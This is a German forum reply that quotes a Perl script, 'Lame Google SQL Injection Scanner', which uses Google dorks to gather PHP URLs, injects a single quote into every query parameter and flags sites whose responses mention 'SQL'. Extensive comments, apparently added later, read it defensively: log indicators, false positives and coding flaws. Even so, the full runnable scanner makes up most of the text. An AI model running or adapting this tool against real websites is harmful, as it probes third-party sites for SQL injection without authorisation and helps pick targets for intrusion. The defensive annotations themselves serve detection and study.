Fisch die Urls halt über Regexp raus. Bsp von nem schwachsinnigen SQLi Scanner:
Code:
#!/usr/bin/perl
#Lame Google SQL Injection Scanner by h0yt3r
#Usage: perl google.pl [Keyword] [Offset]
#Expl: perl google.pl inurl:php+id 100
#If Offset == 1 -> Scan Site #1 to #100
#If Offset == 100 -> Scan Site #100 to #200 etc...
#
# Analyst notes (defensive read of this script):
#   - Flow: fetch one page of Google results for the dork in argv[0], pull
#     result URLs out of the HTML with a regex, rewrite every query-string
#     value to "1%27" (a URL-encoded single quote), request each rewritten
#     URL over plain http, and report any response body containing the
#     literal "SQL".  The "vulnerable" verdict is nothing more than that
#     substring test, so false positives are expected and nothing is
#     confirmed.
#   - Indicators visible in a target's access logs: the hard-coded, dated
#     User-Agent set below, and query strings in which *every* parameter
#     has the value 1%27.
#   - Hygiene: no `use strict; use warnings;`, so $keyw, $offset, $googlUrl,
#     $urls, $resp and $count are undeclared package globals.
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
# Fixed User-Agent string -- a stable fingerprint for log-based detection.
$ua->agent('Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9');
$ua->timeout(5);   # per-request timeout, seconds
$keyw = shift;     # search dork; concatenated into the URL without encoding
$offset = shift;   # Google "start=" parameter
# Unanchored /\d+/: any argument containing a digit passes (e.g. "x1").
die("How bouta usage?!\n") if ( $offset !~ /\d+/ );
my @aUrls;         # declared but never used
my @bUrls;         # candidate URLs after the "=1%27" rewrite, in result order
my $vulnCounter = 0;
my @vulns;         # URLs whose response body matched /SQL/
my $goodURL;       # current rewritten URL; keeps its old value when a result is skipped
my $goodURL1;      # previously accepted URL, used to drop back-to-back duplicates
####Google search...
# Builds the /cse (custom search) results URL: num=100 hits starting at
# $offset, German UI (hl=de).  $keyw is interpolated as given, so spaces or
# "&" in the argument change the query rather than being escaped.
$googlUrl =
"http://www.google.com/cse?&hl=de&num=100&start="
. $offset
. "&cx=013269018370076798483:gg7jrrhpsy4&cof=FORID:1&q="
. $keyw
. "&sa=Search";
my $response = $ua->get($googlUrl);
print "[x]Ok scanning: " . $googlUrl . "\n";
die("Connection failed!\n") unless ( $response->is_success );
# Result extraction depends on Google's markup of the time (<span class=a>).
# Note the two capture groups: in list context a /g match returns *both*
# groups for every hit, so the loop sees each result twice -- once with the
# span tags, once without.  After the tag-stripping below both copies are
# identical, which is what the $goodURL1 comparison further down relies on.
foreach $urls ( $response->content =~ /(<span class=a>(.*?)<\/span>)/g ) {
# Strip the opening span, closing tags and <b> highlighting.
$urls =~ s/<(\/.*?|b|.*=a)>//g;
# Double negative: the rewrite runs only when the URL looks like
# ".php?name=...".  Every "=value" becomes "=1%27".  A non-matching result
# leaves $goodURL at the previous iteration's value, which the equality
# check below then discards -- i.e. non-.php results are dropped silently.
( $goodURL = $urls ) =~ s/=\S+/=1%27/g unless ( $urls !~ /\.php\?\S+=/ );
# Skips only consecutive duplicates (the second capture-group copy and the
# stale-$goodURL case); non-adjacent repeats are handled by %Seen below.
if ( $goodURL1 ne $goodURL ) { $goodURL1 = $goodURL; }
else { next; }
push( @bUrls, $goodURL1 );
}
# Order-preserving de-duplication of @bUrls.
my @unique = ();
my %Seen = ();
foreach my $elem (@bUrls) {
next if $Seen{$elem}++;
push @unique, $elem;
}
# One GET per candidate.  "http://" is prepended unconditionally, so every
# host is probed over plain HTTP regardless of what the result page used.
foreach (@unique) {
$resp = $ua->get( "http://" . $_ );
print "Scanning " . $_ . "\n";
# Verdict is a bare substring test on the body: any page that merely
# mentions "SQL" (documentation, forums, unrelated error text) is flagged.
# $resp->is_success is not checked here, so a failed request is not told
# apart from a real response before its content is inspected.
if ( $resp->content =~ /SQL/ ) #lulz
{
print "[x-->]" . $_ . " seems to be vulnerable!\n";
push( @vulns, $_ );
$vulnCounter++;
}
}
# Summary: count plus a numbered list of every URL that matched /SQL/.
print "#############\nThere were totaly "
. $vulnCounter
. " sites vulnerable using dork "
. $keyw . ":\n";
$count = 1;
foreach (@vulns) {
print "[" . $count . "] http://" . $_ . "\n";
$count++;
}